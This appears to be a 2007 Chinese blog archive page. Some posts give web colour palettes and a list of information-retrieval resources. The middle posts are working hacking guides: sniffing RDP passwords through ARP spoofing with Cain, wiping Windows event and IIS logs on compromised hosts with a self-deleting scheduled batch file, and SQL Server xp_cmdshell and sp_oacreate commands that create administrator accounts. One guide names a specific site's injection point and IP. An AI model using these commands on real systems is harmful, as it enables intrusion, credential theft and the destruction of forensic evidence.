23 2007

设计师谈网页配色:按颜色分类(绿色)

Posted by Yangybcy in 资料

  绿色也是在网页中使用最为广泛的颜色之一。

  因为它本身具有一定的与健康相关的感觉,所以也经常用于与健康相关的站点。绿色还经常用于一些公司的公关站点或教育站点。

  • 当搭配使用绿色和白色时,可以得到自然的感觉。
  • 当搭配使用绿色与红色时,可以得到鲜明且丰富的感觉。
  • 同时,一些色彩专家和医疗专家们提出绿色可以适当缓解眼部疲劳。

Color Point:

人们看到绿色的时候,第一反应就会想到大自然。很多人都说绿色是大自然的颜色,绿色也代表着大自然中的每一个可贵的生命。大自然给了我们新鲜的氧气,而绿色也能使我们的心情变得格外明朗。当需要揭开心中的抑郁时,当需要找回安详与宁静的感觉时,回归大自然是最好的方法。

 
 
 
r 0 r 255 r 255
g 153 g 255 g 255
b 102 b 255 b 0
#009966 #ffffff #ffff00
 
 
 
r 51 r 255 r 153
g 153 g 255 g 51
b 51 b 255 b 204
#339933 #ffffff #9933cc
 
 
 
r 51 r 255 r 0
g 153 g 255 g 0
b 51 b 255 b 0
#339933 #ffffff #000000
     
r 51 r 153 r 255
g 153 g 204 g 255
b 51 b 0 b 204
#339933 #99cc00 #ffffcc
     
r 255 r 204 r 51
g 255 g 204 g 102
b 204 b 102 b 102
#ffffcc #cccc66 #336666
     
r 153 r 255 r 51
g 204 g 255 g 102
b 51 b 102 b 0
#99cc33 #ffff66 #336600
     
r 51 r 204 r 102
g 153 g 153 g 102
b 51 b 0 b 102
#339933 #cc9900 #666666
     
r 51 r 204 r 0
g 153 g 204 g 51
b 102 b 204 b 102
#339966 #cccccc #003366
     
r 102 r 204 r 0
g 153 g 204 g 0
b 51 b 204 b 0
#669933 #cccccc #000000
     
r 51 r 204 r 102
g 153 g 204 g 153
b 51 b 204 b 204
#339933 #cccccc #6699cc
     
r 0 r 204 r 204
g 102 g 204 g 153
b 51 b 51 b 51
#006633 #cccc33 #cc9933
     
r 51 r 102 r 204
g 153 g 102 g 204
b 51 b 51 b 102
#339933 #666633 #cccc66
     
r 51 r 255 r 51
g 153 g 204 g 102
b 51 b 51 b 153
#339933 #ffcc33 #336699
     
r 0 r 102 r 153
g 102 g 153 g 204
b 51 b 51 b 153
#006633 #669933 #99cc99
     
r 51 r 153 r 204
g 102 g 102 g 204
b 102 b 51 b 51
#336666 #996633 #cccc33
     
r 0 r 102 r 204
g 51 g 153 g 204
b 0 b 51 b 153
#003300 #669933 #cccc99
     
r 0 r 153 r 255
g 102 g 0 g 153
b 51 b 51 b 0
#006633 #990033 #ff9900
     
r 0 r 51 r 204
g 102 g 51 g 204
b 51 b 0 b 153
#006633 #333300 #cccc99
     
r 0 r 102 r 204
g 102 g 51 g 204
b 51 b 0 b 102
#006633 #663300 #cccc66
 
     
r 153 r 204 r 0
g 51 g 153 g 51
b 51 b 102 b 0
#993333 #cc9966 #003300
收藏与分享
23 2007

设计师谈网页配色:按颜色分类(蓝色)

Posted by Yangybcy in 资料

  很多站点都在使用蓝色与青绿色的搭配效果。最具代表性的蓝色物体莫过于海水和蓝天 ,而这两种物体都会让人有一种清凉的感觉。

  • 高彩度的蓝色会营造出一种整洁轻快的印象。
  • 低彩度的蓝色会给人一种都市化的现代派印象。

  蓝色与绿色、白色的搭配在我们的现实生活中也使随处可见的,它的应用范围几乎覆盖了整个地球。

  • 主颜色选择明亮的蓝色,配以白色的背景和灰亮的辅助色,可以使站点干净而整洁,给人庄重、充实的印象。
  • 蓝色、青绿色、白色的搭配可以使页面看起来非常干净清澈。

Color Point:

蓝色会使人自然地联想起大海和天空,所以也会使人产生一种爽朗、开阔、清凉的感觉。作为冷色的代表颜色,蓝色会给人很强烈的安稳感,同时蓝色还能够表现出和平、淡雅、洁净、可靠等多种感觉。

低彩度的蓝色主要用于营造安稳、可靠的氛围,而高彩度的蓝色可以营造出高贵的严肃的氛围。

     
r 255 r 204 r 255
g 255 g 255 g 204
b 204 b 255 b 204
#ffffcc #ccffff #ffcccc
 
 
 
r 153 r 255 r 51
g 204 g 255 g 153
b 204 b 255 b 204
#99cccc #ffffff #3399cc
     
r 204 r 153 r 255
g 255 g 204 g 255
b 204 b 204 b 204
#ccffcc #99cccc #ffffcc
 
 
 
r 204 r 255 r 153
g 204 g 255 g 204
b 255 b 255 b 255
#ccccff #ffffff #99ccff
     
r 255 r 255 r 153
g 204 g 255 g 204
b 153 b 204 b 255
#ffcc99 #ffffcc #99ccff
 
 
 
r 51 r 255 r 153
g 102 g 255 g 204
b 153 b 255 b 204
#336699 #ffffff #99cccc
 
 
 
r 153 r 255 r 204
g 204 g 255 g 255
b 204 b 255 b 153
#99cccc #ffffff #ccff99
     
r 204 r 255 r 204
g 204 g 255 g 255
b 255 b 204 b 255
#ccccff #ffffcc #ccffff
 
 
 
r 153 r 255 r 51
g 204 g 255 g 102
b 204 b 255 b 153
#99cccc #ffffff #336699
     
r 153 r 204 r 102
g 204 g 255 g 153
b 255 b 255 b 204
#99ccff #ccffff #6699cc
 
 
 
r 153 r 255 r 51
g 204 g 255 g 153
b 51 b 255 b 204
#99cc33 #ffffff #3399cc
     
r 0 r 255 r 102
g 153 g 255 g 102
b 204 b 204 b 153
#0099cc #ffffcc #666699
     
r 204 r 0 r 153
g 204 g 51 g 204
b 204 b 102 b 255
#cccccc #003366 #99ccff
 
 
 
r 0 r 255 r 102
g 153 g 255 g 102
b 204 b 255 b 102
#0099cc #ffffff #666666
     
r 204 r 102 r 102
g 204 g 153 g 102
b 204 b 204 b 102
#cccccc #6699cc #666666
     
r 51 r 204 r 0
g 102 g 204 g 51
b 153 b 153 b 102
#336699 #cccc99 #003366
     
r 51 r 0 r 204
g 153 g 51 g 204
b 204 b 102 b 204
#3399cc #003366 #cccccc
     
r 102 r 0 r 0
g 153 g 102 g 0
b 204 b 153 b 0
#6699cc #006699 #000000
     
r 0 r 204 r 0
g 51 g 204 g 102
b 102 b 204 b 153
#003366 #cccccc #006699
 
     
r 153 r 51 r 51
g 153 g 102 g 51
b 51 b 153 b 51
#999933 #336699 #333333
收藏与分享
22 2007

推荐:3389的密码嗅探

Posted by Yangybcy in 资料
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
文章作者:凋凌玫瑰[N.C.P.H]

Arp欺骗加嗅探,玩黑的朋友一定不会陌生,大家玩得最多的就是在同网段中嗅探ftp的密码,所以一般都喜欢渗透的主站开个ftp,但更多的时候是主站开3389的机率要比ftp大吧,如果能直接嗅探3389岂不是更爽。
Cain是大家都熟悉的一款软件,具有arp欺骗加嗅探和密码破解的功能,这里提供一个最新版的下载地址:
http://www.ncph.net/cain.exe,具体用法就不多讲了,相信大家都会用这个。本来cain就自带了嗅探终端(3389)密码的功能,但没有听用过,以前我也没有用过这个功能,但一次无意间使用嗅探时开了嗅探3389的功能,最后其它的什么都没有嗅探到,去嗅探到了一个RDP值,打开一分析,原来3389的密码就在其中。
很多朋友看了我的blog中的那个网站的渗透,都问我怎么嗅探到3389密码的,所以我打算把这个写出来共享给大家,转载请注明。
这里给大家做一个图文教程:首先安装cain.exe,默认安装就ok.
1.打开sniffer页面:


2.打开端口配置,设置嗅探3389端口:


3.点击嗅探和右击扫描mac:


4.打开arp页面,单击“+”号,打开欺骗设置:


5.左边选网关,右边选欺骗的ip:


6.点击欺骗按钮开始欺骗:


7.显示欺骗到一条数据


8.选择arp-rdp,在右边栏中右击数据


9.右击后打开的文档:


10:在文档中找到3389的管理员登录用户名和密码:


以上在外网和内网中测试通过,可以准确地抓到管理员密码,但必须是管理员登录成功后才能抓到,其实cain利用了arp欺骗截取数据传输封包,并且能破解3389的加密协议,软件不错。

收藏与分享
22 2007

清理你入侵后的三个重要痕迹

Posted by Yangybcy in 资料

应用程序日志、
安全日志、
系统日志、

DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志

以上日志在注册表里的键: 应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog

钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录、注销失败

怎样删除这些日志: 通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志、安全日志、应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.

下面就是很难的安全日志和系统日志了,守护这些日志的服务是Event Log,试着停掉它! D:SERVERsystem32LogFilesW3SVC1>net stop eventlog 这项服务无法接受请求的"暂停" 或"停止" 操作。
怎么清除系统日志.
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat -an 表示的什么意思

===================================
1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe

使用方法:
Usage: clearlogs [\computername] <-app / -sec / -sys>

-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \ipipc$ 密码/user:用户名
** 然后开始清除: 方法
clearlogs \ip -app 这个是清除远程计算机的应用程序日志
clearlogs \ip -sec 这个是清除远程计算机的安全日志
clearlogs \ip -sys 这个是清除远程计算机的系统日志

b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
然后清除. 方法:

clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统日志

安全日志已经被清除.Success: The log has been cleared 成功.

为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat

rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束

在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出

用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法

AT 时间 c:c.bat

之后你就可以安全离开了. 这样才更安全一点.

===================================

 

2.清除iis日志:
工具:cleaniis.exe
使用方法:
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the

使用方法解释:
cleaniis.exe iis日志存放的路径 清除参数

什么意思呢??我来给大家举个例子吧:
cleaniis c:winntsystem32logfilesw3svc1 192.168.0.1
这个表示清除log中所有此IP(192.168.0.1)地址的访问记录. —–推荐使用这种方法

cleaniis c:winntsystem32logfilesw3svc1 /shop/admin/
这个表示清除这个目录里面的所以的日志

c:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变
c:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变

这个测试表示 在日志里面没有这个ip地址.
我们看一下日志的路径 再来看一下
我们的ip(192.168.0.1)已经没有了.
已经全部清空.

同样这个也可以建立批处理. 方法同上面的那个.

===================================
3.清除历史记录及运行的日志:
cleaner.exe
直接运行就可以了.

===================================
4.察看blackice的日志.
这个地方我们可以清除的看到 防火墙的日志.

这个表示 有人发过来带有病毒的email附件. ip是: 220.184.153.116
tcp_probe_other 表示 通过tcp 扫描 或者利用别的和你建立连接 通信
这个表示通过端口 80 扫描iis
病毒 nimda
这里需要很多的计算机协议知识. 同时也需要对英语有了解
才能更好的分析 如果对英语不好 你可以装一个金山词霸.
一般情况下 我们可以 对一些可以不用管.
一般这三种情况 不用去管.
最上面的 critical 这个 可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机

count 代表次数 intruder 是对方的ip event 是通过什么方式(协议) 扫描或者想入侵的
time表示时间

5.===================================
netstat -an 表示什么意思?
使用这个命令可以察看到和本机的所有的连接.

Proto Local Address Foreign Address State
协议 本地端口及IP地址 远程端口及IP地址 状态

LISTENING 监听状态 表示等待对方连接

ESTABLISHED 正在连接着.

TCP 协议是TCP

UDP 协议是UDP

TCP 192.168.0.10:1115 61.186.97.54:80 ESTABLISHED
这个表示 利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接
80端口 表示 http 就是你在访问这个网站.

一般情况下远程ip的端口: 80 21 8000 这个都是正常的. 如果是别的 就可以看一下你的计算机了

收藏与分享
03 2007

再次突破SA的方法

Posted by Yangybcy in 资料

xp_cmdshell新的恢复办法
删除
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc ‘xp_cmdshell’

恢复
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

这样可以直接恢复,不用去管sp_addextendedproc是不是存在

—————————–

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc ‘xp_cmdshell’

恢复cmdshell的sql语句
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’

开启cmdshell的sql语句

exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
返回结果为1就ok

恢复xp_cmdshell
exec master.dbo.addextendedproc ‘xp_cmdshell’,'xplog70.dll’;select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
返回结果为1就ok

否则上传xplog7.0.dll
exec master.dbo.addextendedproc ‘xp_cmdshell’,'c:\winnt\system32\xplog70.dll’

堵上cmdshell的sql语句
sp_dropextendedproc "xp_cmdshell

 

 

 

{技术}突破SA的各种困难

今天跟无聊兄弟,搞了很多开1433端口的服务器。但是要到密码了。总是有一些不能直接执行CMD

但是看了下面的文章,嘎嘎………………全部突破!

———————————————————————————————————————————–

方法1:查询分离器连接后
第一步执行:use master
第二步执行:sp_dropextendedproc ‘xp_cmdshell’
然后按F5键命令执行完毕

三.常见情况恢复执行xp_cmdshell.

1 未能找到存储过程’master..xpcmdshell’.
恢复方法:查询分离器连接后,
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
恢复方法:查询分离器连接后,
第一步执行:sp_dropextendedproc "xp_cmdshell"
第二步执行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令执行完毕

3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
恢复方法:查询分离器连接后,
第一步执行:exec sp_dropextendedproc ‘xp_cmdshell’
第二步执行:exec sp_addextendedproc ‘xp_cmdshell’,'xpweb70.dll’
然后按F5键命令执行完毕

四.终极方法.
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
查询分离器连接后,
2000servser系统:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add’

xp或2003server系统:

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户 密码 /add’

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add’

 

 

SA权限添加管理员帐号的SQL命令
注入点:http://www.enzymotec.com/Page.asp cc=0102041102           IP:192.117.122.145     以色列 inurl:asp
具体脚本命令:
1.判断是否有注入;and 1=1 ;and 1=2  
;and user_name()=’dbo’ 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell ‘net user jiaozhu jiaozhu /add’;–
;exec master.dbo.xp_cmdshell ‘net localgroup administrators jiaozhu /add’;–
 
 
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c
这段命令是通过SQL执行系统命令的
例如:
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net user jiss 111 /add’
这段命令是通过SQL执行系统命令的
 
 
 

需要有管理员权限,在命令下先建立一个c:\test.qry文件,内容如下:
exec master.dbo.sp_addlogin test,123
EXEC sp_addsrvrolemember ‘test, ’sysadmin’
然后在DOS下执行:cmd.exe /c isql -E /U alma /P /i c:\test.qry

收藏与分享
02 2007

搜索引擎 相关论文

Posted by Yangybcy in 资料

一般获取类似文章最好的渠道是两个:

其一是找一下相关领域比较出名的国际会议,比如你说的领域,ACM SIGIR/SIGKDD, WWW, ECIR等会议就都有涉及。找一下他们近年来的会议网站,获取到近年的论文清单,然后使用Google获得论文的全文

其二是利用ACM library和IEEE,springer的网站查找相关期刊的论文,但是一般这些网站都不提供论文的免费下载服务,这可能就需要你找一些高校的朋友帮你利用高校的免费资源下载,或者利用google的英文搜索和sogou的中文搜索获取这些论文了。

我们可能会在下个月初放出一部分sogoulab和高校协作完成的工作论文,这部分文章也可以供你参考

返回 搜狗实验室 吧查看更多热帖

<4 楼> 作者: sogoulab     ( 2006-12-21 20:33  )
下面是闫老师的资源列表:

zz from [net.pku.edu.cn]

信息检索领域相关资料 (A Guide to Information Retrieval)
Organized by Hongfei Yan
Last updated on April 19, 2006

———————
Contents
Books
+ Finding Out About: Search Engine Technology from a cognitive
Perspective (Belew, R.K., 2000)
[www-cse.ucsd.edu]
+ Foundations of Statistical Natural (C. Manning and H. Schutze, 1999)
+ Information Retrieval, 2nd edition (C.J. van Rijsbergen, 1979)
(full text)
[www.dcs.gla.ac.uk]
+ Information Retrieval: A Survey (Ed Greengrass, 2000)
[www.csee.umbc.edu]
+ Information Retrieval: Data Structures & Algorithms
(Frakes, W. and Baeza-Yates, R., 1992)
[www.dcc.uchile.cl]
+ Information Retrieval Interaction (Ingwersen, P., Taylor Graham, 1992)
[www.db.dk]
+ Managing Gigabytes:compressing and indexing documents and images,
2nd edition, (Ian H. Witten, Alistair Moffat,and Timothy Bell,1999)
+ Mining the Web: Discovering Knowledge from Hypertext Data
(Soumen Chakrabarti, 2003)
+ Modeling the Internet and the Web:
probabilistic Methods and Algorithms
(Pierre Baldi, Paolo Frasconi and Padhraic Smyth, 2003)
+ Modern Information Retrieval
(Ricardo Baeza-Yates and Berthier Ribeiro-Neto, 2000)
+ Readings in Information Retrieval.
(Sparck-Jones, K. and Willett, P., 1997)
+ Search Engine: Principle,Technology and Systems
搜索引擎-原理、技术与系统
(Xiaoming Li,et al., 2005 ), (full text)
[sewm.pku.edu.cn]
+ The Geometry of Information Retrieval
(C.J. van Rijsbergen, 2004)
[ir.dcs.gla.ac.uk]
+ The Turn: Integration of Information Seeking and Retrieval in Context
(Ingwersen, P., and Jarvelin, K., 2005)
+ TREC: Experiment and Evaluation in Information Retrieval
(Voorhees, E.M., and Harman, D.K., 2005)
[mitpress.mit.edu]

Conferences and Workshops
+ CIKM: Conference on Information and Knowledge Management
[www.csee.umbc.edu]
+ SIGIR: Special Interest Group on Information Retrieval
[www.sigir.org]
+ World Wide Web
[www.iw3c2.org]
+ SEWM: Symposium of Search Engine and WebMining
全国搜索引擎和网上信息挖掘学术研讨会
[net.pku.edu.cn]

Courses
+ CMU Information Retrieval
[nyc.lti.cs.cmu.edu] (Spring 2006)
Instructors: Jamie Callan and Yiming Yang
+ Cornell University The Structure of Information Networks (Spring 2006)
[www.cs.cornell.edu]
Instructor: Jon Kleinberg
+ Peking University Web Based Information Architectures (Fall 2005)
[net.pku.edu.cn]
Instructor: Xiaoming Li, Jimin Wang and Bo Peng
+ Stanford Univ. Text Information Retrieval and Web Mining (Autumn 2005)
[www.stanford.edu]
Instructor: Christopher Manning and Prabhakar Raghavan
+ UIUC Introduction to Text Information Systems (Spring 2006)
[sifaka.cs.uiuc.edu]
Instructor: ChengXiang Zhai
+ UMass Univ. Information retrieval course (Spring 2005)
[ciir.cs.umass.edu]
Instructors: James Allan
+ Washington Univ. Search Engines course
[courses.washington.edu]

Evaluation Resources
+ CLEF: Cross-Language Evaluation Forum
[clef.iei.pi.cnr.it]
+ CWIRF: Chinese Web Information Retrieval Forum
[www.cwirf.org]
+ DUC: Document Understanding Conferences
[duc.nist.gov]
+ INEX: INitiative for the Evaluation of XML Retrieval
[inex.is.informatik.uni-duisburg.de]
+ NTCIR: NII-NACSIS Test Collection for IR Systems
[research.nii.ac.jp]
+ TREC: Text REtrieval Conference
[trec.nist.gov]

Journals
+ Briefings in Bioinformatics (full text)
[bib.oxfordjournals.org]
+ Computational Linguistics, The MIT Press
[mitpress.mit.edu]
+ Data & Knowledge Engineering (DKE), Elsevier
[www.elsevier.com]
+ D-Lib Magazine
[www.dlib.org]
+ Information Processing Letters, Elsevier
[www.elsevier.com]
+ Information Processing and Management (IP&M), Elsevier
[www.elsevier.com]
+ Information Retrieval, Springer
[www.springer.com]
+ Information Research
[informationr.net]
+ International Journal on Digital Libraries, Springer
[link.springer.de]
+ International Journal of Cooperative Information Systems (IJCIS),
World Scientific
[ejournals.wspc.com.sg]
+ International Journal on Document Analysis and Recognition, Springer
[link.springer.de]
+ International Journal of Intelligent Systems, Wiley
[www3.interscience.wiley.com]
+ International Journal of Uncertainty, Fuzziness and Knowledge-Based Systems (IJUFKS), World Scientific
[ejournals.wspc.com.sg]
+ Journal of the American Society for Information Science and Technology (JASIST), Wiley
[www3.interscience.wiley.com]
+ Journal of Documentation (JDoc). Emerald
[www.emeraldinsight.com]
+ Journal of Intelligent Information Systems (JIIS), Springer
[www.wkap.nl]
+ Knowledge and Information Systems (KAIS), Springer
[link.springer.de]
+ Natural Language Engineering, Cambridge University Press
[www.cambridge.org]
+ Transactions On Information Systems (TOIS), ACM
[www.acm.org]
+ Transactions on Knowledge and Data Engineering (TKDE), IEEE
[www.computer.org]

List Archives
+ SIG-IRList, [www.sigir.org]

Organizations and Special Interest Groups
+ Cambridge NLIP, [www.cl.cam.ac.uk]
+ CMU LTI, [www.lti.cs.cmu.edu]
+ DEC laboratories in Palo Alto, Calif.
+ Glasgow Information Retrieval Group, [www.dcs.gla.ac.uk]
+ Google Labs, [labs.google.com]
+ LTI, [www.lti.cs.cmu.edu]
+ Massachusetts CIIR, [ciir.cs.umass.edu]
+ MSR Asia, Web Search & Data Mining Group
[research.microsoft.com]
+ Standford InfoLab, [infolab.stanford.edu]
+ UIUC Information Retrieval Group, [sifaka.cs.uiuc.edu]
+ 北大天网组, [sewm.pku.edu.cn]
+ 北京大学计算语言学研究所, [icl.pku.edu.cn]
+ 复旦大学信息检索和自然语言处理组,
[www.cs.fudan.edu.cn]
+ 哈工大信息检索组, [ir.hit.edu.cn]
#+ 清华大学智能技术与系统国家重点实验室, (fail to visit the URL)
# [www.csai.tsinghua.edu.cn]
+ 中科院大规模内容计算组, [159.226.40.18]

Researchers
+ ChengXiang Zhai, developing Lemur
[www-faculty.cs.uiuc.edu]
+ Gerard Salton
[www.cs.cornell.edu]
+ Karen Sparck, developing IDF
[www.cl.cam.ac.uk]
+ Keith van Rijsbergen
[www.dcs.gla.ac.uk]
+ Jamie Callan,
[www.cs.cmu.edu]
+ Jon Kleinberg, developing HIT
[www.cs.cornell.edu]
+ Li Xiaoming, developing Tianwang & Infomall
+ Nick Craswell, developing Terabyte Track
[research.microsoft.com]
+ Susan Dumais, developing LSI
[research.microsoft.com]
+ Yiming Yang, developing text categorization
[www.cs.cmu.edu]
+ Stephen Robertson,
[research.microsoft.com]
+ Tefko Saracevic
[www.scils.rutgers.edu]
+ W. Bruce Croft
[ciir.cs.umass.edu]

Research-related Resources
+ [www-faculty.cs.uiuc.edu]

Software
+ Apache Lucene: a full-featured text search engine library
[lucene.apache.org]
+ Gate: a general architecture for text engineering
[gate.ac.uk]
+ Lemur: A full-text search engine
[www.lemurproject.org]
+ MG: A full-text search engine
[www.math.utah.edu]
+ Porter Stemmer: English stemming algorithm
[www.tartarus.org]
+ Nutch: an open source web search engine
[sourceforge.net]
+ TSE: A Tiny Search Engine
[sewm.pku.edu.cn]

———————
Ref
erences:
[1] Information Retrieval Resources, [www.sigir.org]
[2] [ir.dcs.gla.ac.uk]
[3] [www.cs.cmu.edu]
[4] Diekemar, Information Retrieval Links, Jan. 28, 1999.
[web.syr.edu]
[5] 陈鸿标,网上研习信息检索,1999年11月.
[159.226.40.18]网上研习信息检索.doc
[6] 数据挖掘研究院, [www.dmresearch.net]
[7] 语音自然语言在线, [www.snlpinfo.com]
[8] PKU SEWM Group, [sewm.pku.edu.cn]
[9] [www.cs.cmu.edu]
[10] [icl.pku.edu.cn]
[11] [www.cs.fudan.edu.cn]
[12] Robert Krovetz, A Guide to the Literature of Information Retrieval,
[159.226.40.18]
[13] ACM Digital Library,
[portal.acm.org]
[acm.lib.tsinghua.edu.cn]
[14] [www.sigir.org]
[15] SIGIR,
[portal.acm.org]
[16] WWW, International World Wide Web Conference
[portal.acm.org]
[17] China Digital Journal Community, [wanfang.calis.edu.cn]

———————

More details are listed as follows
====================
CIIR
(The Center for Intelligent Information Retrieval,
美国Massachusetts大学的智能信息检索中心)
[ciir.cs.umass.edu]

The Center for Intelligent Information Retrieval, a National Science
Foundation-created S/IUCRC Center, is one of the leading information retrieval
research labs in the world. The CIIR develops tools that provide effective
and efficient access to large, heterogeneous, distributed, text and
multimedia databases.

CIIR accomplishments include significant research advances in the areas of
distributed information retrieval, information filtering, topic detection,
multimedia indexing and retrieval, document image processing, terabyte
collections, data mining, summarization, resource discovery, interfaces
and visualization, and cross-lingual information retrieval.

The Center for Intelligent Information Retrieval continues to support the
emerging information infrastructure, both through research and technology
transfer. The goal of the CIIR is to develop tools that provide effective
and efficient access to large, heterogeneous, distributed, text and
multimedia databases.

====================
Glasgow Information Retrieval Group
[www.dcs.gla.ac.uk]
由Keith van Rijsbergen率领的英国Glasgow大学信息检索研究小组。
这个小组理论和实践并重,旨在建造一个高效、新颖、成功的多媒体信息检索系统,
为终极用户服务。

The Information Retrieval Group led by Professor Keith van Rijsbergen has a
vigorous programme of research, based on both theory and experiment, aimed at
giving end-users novel, effective, and efficient access to the world of
multi-media information. The group, part of the Department of Computing Science,
University of Glasgow, has a strong research history in a wide area of
information retrieval research from theoretical modelling of the retrieval
process to advanced system building and to the user-oriented evaluation of
information retrieval systems. The group’s interests also include many areas
of Web information retrieval such as link analysis, summarisation and the
development of novel interaction techniques (e.g., ostension, implicit feedback
and graphical visualisation). Our research preserves a strong emphasis on
the evaluation of interactive IR systems, and the group maintains strong links
with researchers in Human-Computer Interaction and Psychology.

——
Keith van Rijsbergen, [www.dcs.gla.ac.uk]
英国格拉斯哥大学。概率IR的逻辑推理学派代表人,出版了著名的IR经典教材
INFORMATION RETRIEVAL, 重点介绍用概率研究信息检的方法。

=====================
Cambridge NLIP Group
(Natural Language and Information Processing Group)
[www.cl.cam.ac.uk]

Research in NLIP has been done in the Computer Laboratory for nearly fifty years.
The earliest work, by Roger Needham and Karen Sparck Jones, was on automatic
thesaurus construction, in the context of document retrieval and machine translation.
Subsequent research by Karen Sparck Jones during the 1960s and 70s focused on
statistical approaches to retrieval and included innovative work on term
weighting. From the later 1970s research in language processing developed,
with work on syntax, semantics and discourse processing,

——
Karen Sparck Jones, [www.cl.cam.ac.uk]
Karen Sparck Jones has been one of the most influential figures in Computing
since the 1950’s. Her work on Information Retrieval and Natural Language Processing
has never been so central as it is are today, with its implications for
search engine technology, the semantic web and even bioinformatics.

In 1972, Karen Sparck Jones published in the Journal of Documentation the paper
which defined the term weighting scheme now known as inverse document frequency (IDF).

Karen Sparck Jones is emeritus Professor of Computers and Information at the
Computer Laboratory, University of Cambridge. She has worked in automatic
language and information processing research since the late fifties,
and has many publications including several books, most recently `Evaluating
Natural Language Processing Systems’ with Julia Galliers, and `Readings in
Information Retrieval’, edited with Peter Willett.

1988年度Salton奖得主。现代概率IR模型的另一创始人。在NLP、IR等领域都颇有建树,
而且做了大量的组织性工作。现在供职于英国剑桥大学计算机学院。

====================
LTI
CMU (Carnegie Mellon Universit) Language Technologies Institute,
[www.lti.cs.cmu.edu]

The Language Technologies Institute (LTI) of the School of Computer Science at
Carnegie Mellon University conducts research and provides graduate education
in all aspects of language technology and information management. The LTI was
established in 1996, as an expansion of the Center for Machine Translation
(CMT).

The Center for Machine Translation (CMT) was a research branch of the School
of Computer Science devoted to basic and applied research in all aspects of
natural language processing, with a primary focus on machine translation,
speech processing, and information retrieval. Containing a unique mix of
academic and industrial researchers specializing in various aspects of
computer science, artificial intelligence, computational linguistics and
theoretical linguistics, the CMT provided a rich and diverse environment for
collaboration among faculty, staff, visiting scholars, and qualified students.

——
Lemur Toolkit
Lemur is a collection of search engine algorithms and information retrieval
applications used for IR research, development and education. Lemur provides a
rich query language that supports search against simple texts, structured
(XML) texts, and texts annotated with part-of-speech, named-entity, and other
annotations used in NLP and text-mining applications. Lemur’s search engines
